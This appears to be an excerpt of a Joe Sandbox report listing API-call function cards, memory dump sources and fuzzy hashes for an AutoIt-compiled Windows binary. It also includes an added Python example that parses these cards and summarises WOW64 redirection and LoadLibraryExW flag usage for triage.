                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: IconNotifyShell_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1144537725-0
                                                                                                                                                                                                                                          • Opcode ID: 2926cf9507a9b1b8dafcea72bf5996e252e196d8971c480474c443ed902e900e
                                                                                                                                                                                                                                          • Instruction ID: 50af65f9edb5b30eb2d042a72a4dd9c2e3d0c00b303d9bf88df7b5386234233a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2926cf9507a9b1b8dafcea72bf5996e252e196d8971c480474c443ed902e900e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 613193B05043019FD760DF24D8847A7BBE4FF49718F00092EF5A997780EBB1AA84DB62
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • timeGetTime.WINMM ref: 000EF661
                                                                                                                                                                                                                                            • Part of subcall function 000DD730: GetInputState.USER32 ref: 000DD807
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 0012F2DE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InputSleepStateTimetime
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4149333218-0
                                                                                                                                                                                                                                          • Opcode ID: 05d964ad316b12e097fcde7a2dbbc06eb033137e1e98062d6b1ef78fc10e798e
                                                                                                                                                                                                                                          • Instruction ID: 7a93c37ab533e2ffc1188bbb7c65f1afc420b99914b23eec8df282241ba5349b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05d964ad316b12e097fcde7a2dbbc06eb033137e1e98062d6b1ef78fc10e798e
• Instruction Fuzzy Hash: 02F0A731240705DFD310EF75E845BAAB7E4FF46760F00002AE859C7361DBB0A840CBA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• __Init_thread_footer.LIBCMT ref: 000DBB4E
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Init_thread_footer
• String ID:
• API String ID: 1385522511-0
• Opcode ID: 9ae4ef5f6e742d22c3a20ae08daa9d34b1c4c4a180468da0bb2584d4d42cd5af
• Instruction ID: ef316e750263deaffdc2b8e4ee9faa9cbde4eb202d11a81ed1ca52686edfdb70
• Opcode Fuzzy Hash: 9ae4ef5f6e742d22c3a20ae08daa9d34b1c4c4a180468da0bb2584d4d42cd5af
• Instruction Fuzzy Hash: 31329A34A00219DFDB25CF58C894ABEB7B9FF49310F16805AE905AB352C774ED91CBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• __Init_thread_footer.LIBCMT ref: 00155930
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Init_thread_footer
• String ID:
• API String ID: 1385522511-0
• Opcode ID: 140fb7d7afeed718272ca911b6f7d7f33714f95a128085b5b501586bf9c79b9c
• Instruction ID: 1915b210ef9205acb1523e55ee9efa2805b3e0f3a16dc073c9a22642852d0634
• Opcode Fuzzy Hash: 140fb7d7afeed718272ca911b6f7d7f33714f95a128085b5b501586bf9c79b9c
• Instruction Fuzzy Hash: 4371CD30600205EFCB24CF54C890EBAB7F6FF59314F108529F965AB282D771AD89CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,000D4EDD,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4E9C
  • Part of subcall function 000D4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000D4EAE
  • Part of subcall function 000D4E90: FreeLibrary.KERNEL32(00000000,?,?,000D4EDD,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4EC0
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4EFD
  • Part of subcall function 000D4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00113CDE,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4E62
  • Part of subcall function 000D4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000D4E74
  • Part of subcall function 000D4E59: FreeLibrary.KERNEL32(00000000,?,?,00113CDE,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4E87
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Library$Load$AddressFreeProc
• String ID:
• API String ID: 2632591731-0
• Opcode ID: e45a2be7e3729d7735188c582c50499a279f5685d4fbe48449b168de3b482ec9
• Instruction ID: 3ec55edad924f517c66db6a15cd1783399d21dd099140263ea2e653c72910b3a
• Opcode Fuzzy Hash: e45a2be7e3729d7735188c582c50499a279f5685d4fbe48449b168de3b482ec9
• Instruction Fuzzy Hash: 8E11E332600305ABCB24AF64DC16FED77A5AF40B11F10843FF552A62E2EF709A459BB0
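The card above is the one function in this dump whose API chain resolves Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection at run time (LoadLibraryA/GetProcAddress/FreeLibrary in the subcalls at 000D4E90 and 000D4E59) and calls LoadLibraryExW with a flags argument of 00000002. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses function cards in this text layout, extracts each card's API chain with subcall attribution, decodes the LoadLibraryExW flag word against the winbase.h values, and emits triage notes. The card text embedded in it is copied from the card above, trimmed to the lines the parser reads; the field names, the regular expression and the triage rules are this example's own choices.

```python
"""Parse Joe Sandbox execution-graph function cards and summarise each
function's Win32 API chain.

Added example, not part of the Joe Sandbox report or its tooling. The
triage rules in summarise() are this example's own choices.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# LoadLibraryEx flag bits from winbase.h, used to decode the third argument
# of LoadLibraryExW as printed on a card.
LOAD_LIBRARY_EX_FLAGS = {
    0x01: "DONT_RESOLVE_DLL_REFERENCES",
    0x02: "LOAD_LIBRARY_AS_DATAFILE",
    0x08: "LOAD_WITH_ALTERED_SEARCH_PATH",
    0x10: "LOAD_IGNORE_CODE_AUTHZ_LEVEL",
    0x20: "LOAD_LIBRARY_AS_IMAGE_RESOURCE",
    0x40: "LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE",
}

# One API line: optional "Part of subcall function X:" prefix, then
# Name.MODULE(args), ref: ADDR. CRT helpers such as __Init_thread_footer
# carry no argument list.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)

# Copied from the LoadLibraryExW function card in this report, trimmed.
SAMPLE_CARD = """
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,000D4EDD,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4E9C
  • Part of subcall function 000D4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000D4EAE
  • Part of subcall function 000D4E90: FreeLibrary.KERNEL32(00000000,?,?,000D4EDD,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4EC0
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4EFD
  • Part of subcall function 000D4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00113CDE,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4E62
  • Part of subcall function 000D4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000D4E74
  • Part of subcall function 000D4E59: FreeLibrary.KERNEL32(00000000,?,?,00113CDE,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4E87
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
Similarity
• API ID: Library$Load$AddressFreeProc
• API String ID: 2632591731-0
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str]   # address of the enclosing subcall, if any


@dataclass
class FunctionCard:
    fields: dict = field(default_factory=dict)   # "API ID", "Source File", ...
    calls: list = field(default_factory=list)


def parse_cards(text):
    """Split report text into cards; each card starts at a 'Uniqueness' line."""
    cards, card = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Uniqueness":
            card = FunctionCard()
            cards.append(card)
            continue
        if card is None or not line.startswith("•"):
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            card.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif ":" in line:
            key, _, value = line[1:].partition(":")
            card.fields[key.strip()] = value.strip()
    return cards


def summarise(card):
    """Triage notes: symbols resolved via GetProcAddress, decoded
    LoadLibraryExW flags, and what those imply for the analyst."""
    resolved = [c.args[1] for c in card.calls
                if c.name == "GetProcAddress" and len(c.args) > 1]
    load_flags = []
    for c in card.calls:
        if c.name == "LoadLibraryExW" and len(c.args) >= 3 and c.args[2] != "?":
            bits = int(c.args[2], 16)
            load_flags += [n for b, n in LOAD_LIBRARY_EX_FLAGS.items() if bits & b]
    notes = []
    if any(s.startswith("Wow64") and s.endswith("FsRedirection") for s in resolved):
        notes.append("toggles WOW64 file-system redirection for the calling thread: "
                     "a 32-bit process reaching the real System32, not SysWOW64")
    if "LOAD_LIBRARY_AS_DATAFILE" in load_flags:
        notes.append("module mapped as data only: DllMain does not run, so this "
                     "is resource/data access rather than code loading")
    return {"api_id": card.fields.get("API ID", ""), "resolved": resolved,
            "load_flags": load_flags, "notes": notes}


if __name__ == "__main__":
    for c in parse_cards(SAMPLE_CARD):
        print(summarise(c))
```

Run it over the whole function section of a report (every card begins at a "Uniqueness" line) to get one summary per function; the Wow64 note and the data-file flag are the two points worth checking here, since neither by itself distinguishes the AutoIt runtime's own helpers from script behaviour, so the next step is to look at which script-level function reaches them.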
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
• Opcode ID: bb79d51b9ba06ed853080688746f855a6279babd715c7e2d143402398d6d4ab2
• Instruction ID: bf67e5477d838f445220e15bede683075f79ffa9c32c102345ed4d975516de01
• Opcode Fuzzy Hash: bb79d51b9ba06ed853080688746f855a6279babd715c7e2d143402398d6d4ab2
• Instruction Fuzzy Hash: AB11487590810AAFCB05DF58E940ADE7BF4EF48304F104069F848EB352DB70DA11CBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetForegroundWindow.USER32(00000000,?,?,?,001614B5,?), ref: 00162A01
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
• Opcode ID: edd6d39e5bd4a22ee3fcdc1d3f3f987b3d995b79baa5ad0c7201ded804e58ad4
• Instruction ID: 9d36f82474db20b284a9700f11c3588c9888aba01e822ce905cb23a08ec41d07
• Opcode Fuzzy Hash: edd6d39e5bd4a22ee3fcdc1d3f3f987b3d995b79baa5ad0c7201ded804e58ad4
• Instruction Fuzzy Hash: FB01B136300E929FD324CA6CC854F227792EBC5318F29C468C0878B691DBB2EC52C7A0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                                                                                                                                          • Instruction ID: 7adf6765dce139bd579b23315875e3efc6b72b3db539b80d2d56e3ae96a8310b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2F0F932510A5C96C7323E65DC05BBA33989F72374F140715F661D79E2DFB09401A6A5
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,?,001A1444,?,000EFDF5,?,?,000DA976,00000010,001A1440,000D13FC,?,000D13C6,?,000D1129), ref: 00103852
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 3f6c968a8af418186caf8fd7bd3a9a3b1e3a0777c4a21d61119cfc80d5ead815
• Instruction ID: 9d04c79fd5a133a0ebab173a5b18034210246705395166e4066bc37563c396ae
• Opcode Fuzzy Hash: 3f6c968a8af418186caf8fd7bd3a9a3b1e3a0777c4a21d61119cfc80d5ead815
• Instruction Fuzzy Hash: 76E0E531100228A6D7212A669C00BEB364CAF427B0F0582A6FDA5928D1CB91DE0191E0
Uniqueness

Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNEL32(?,?,001A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 000D4F6D
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: b635aeddff4c3c9964403ffc430225b9d03ab4b5637f25d531e3e9afb23dc86c
• Instruction ID: 072dd5d674a036797a2a2cda419833d5c897e10e20900cb92b3f401b9569e95b
• Opcode Fuzzy Hash: b635aeddff4c3c9964403ffc430225b9d03ab4b5637f25d531e3e9afb23dc86c
• Instruction Fuzzy Hash: 66F03971105752CFDB349F64D890866BBF4AF14329320897FE2EA82A31CB319884DF60
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsWindow.USER32(00000000), ref: 00162A66
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Window
• String ID:
• API String ID: 2353593579-0
• Opcode ID: 7c72ca6421324293b4508e606943929eed947b53a29da947ab56f514795c03b7
• Instruction ID: 2132b62326f1292ec43659ec1f7e14547523c0bf1b355df1a4a61c40699ac31c
• Opcode Fuzzy Hash: 7c72ca6421324293b4508e606943929eed947b53a29da947ab56f514795c03b7
• Instruction Fuzzy Hash: 40E02636350516ABC714EB70DC808FE734CEF20394B000436FC26C3500DB7099A182F0
Uniqueness

Uniqueness Score: -1.00%

APIs
• Shell_NotifyIconW.SHELL32(00000002,?), ref: 000D314E
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: IconNotifyShell_
• String ID:
• API String ID: 1144537725-0
• Opcode ID: 0a118ccf8d09727029d58d2d942b4f638ad8c7d8ad2081996dbb9a307b30b23c
• Instruction ID: 4a9cb0c0cc346e85eaf6c1ba23bd19fbd1f9a7fe6d7ea721c21ef89abbff3564
• Opcode Fuzzy Hash: 0a118ccf8d09727029d58d2d942b4f638ad8c7d8ad2081996dbb9a307b30b23c
• Instruction Fuzzy Hash: 1CF03771914358AFEB52DF24DC457D67BFCBB01708F0000E5A68896692DBB457C8CF51
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 000D2DC4
  • Part of subcall function 000D6B57: _wcslen.LIBCMT ref: 000D6B6A
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
                                                                                                                                                                                                                                          • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 541455249-0
                                                                                                                                                                                                                                          • Opcode ID: 3468d1330ff4941580925c969ecb6be0d51ead8073797bb9cc6d1b063ab5182f
                                                                                                                                                                                                                                          • Instruction ID: 06429b4d8df68a1aaa4adf11959a3086572e0951e0f27205b125a9dc71cd9257
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3468d1330ff4941580925c969ecb6be0d51ead8073797bb9cc6d1b063ab5182f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24E0CD726042245BC710A2589C05FEA77DDDFC8790F040076FD09D7248DA60ADC4C5A0
                                                                                                                                                                                                                                          Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000D3908
  • Part of subcall function 000DD730: GetInputState.USER32 ref: 000DD807
• SetCurrentDirectoryW.KERNEL32(?), ref: 000D2B6B
  • Part of subcall function 000D30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 000D314E
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: IconNotifyShell_$CurrentDirectoryInputState
• String ID:
• API String ID: 3667716007-0
• Opcode ID: c51ae943452bd1db8a8ac87c1fa09a5b33054f059ee97dc09745e870b4e98593
• Instruction ID: 481a91bd8a43e069c5d576d42e0e96ff1ab154ec6b186b4856b2da4b761552d6
• Opcode Fuzzy Hash: c51ae943452bd1db8a8ac87c1fa09a5b33054f059ee97dc09745e870b4e98593
• Instruction Fuzzy Hash: 95E0862170434416C604BB79A8525FDBB599BD6761F40153FF18283363DF6489854272
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,00000000,?,00110704,?,?,00000000,?,00110704,00000000,0000000C), ref: 001103B7
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: d3d94353d686bca887964e7525c960f0a41207753d4d3c5a8fe7069c38fe0ff8
• Instruction ID: 39affdb812513899b39c8a67cf64b4eb9d383045785f874eb4bee2c59d9bc1bd
• Opcode Fuzzy Hash: d3d94353d686bca887964e7525c960f0a41207753d4d3c5a8fe7069c38fe0ff8
• Instruction Fuzzy Hash: 1DD06C3204010DFBDF029F84DD06EDA3BAAFB48714F014000FE5856020C772E861AB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 000D1CBC
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: InfoParametersSystem
• String ID:
• API String ID: 3098949447-0
• Opcode ID: a6955c8f0dfc272768c83e7d56d21cf5d7f582fb0a5633cfe016d7614e223b74
• Instruction ID: 72d88d18c50e5cd2f3fd6c7061e4d072bc717c2bd894c9da616091e16b4ee7ea
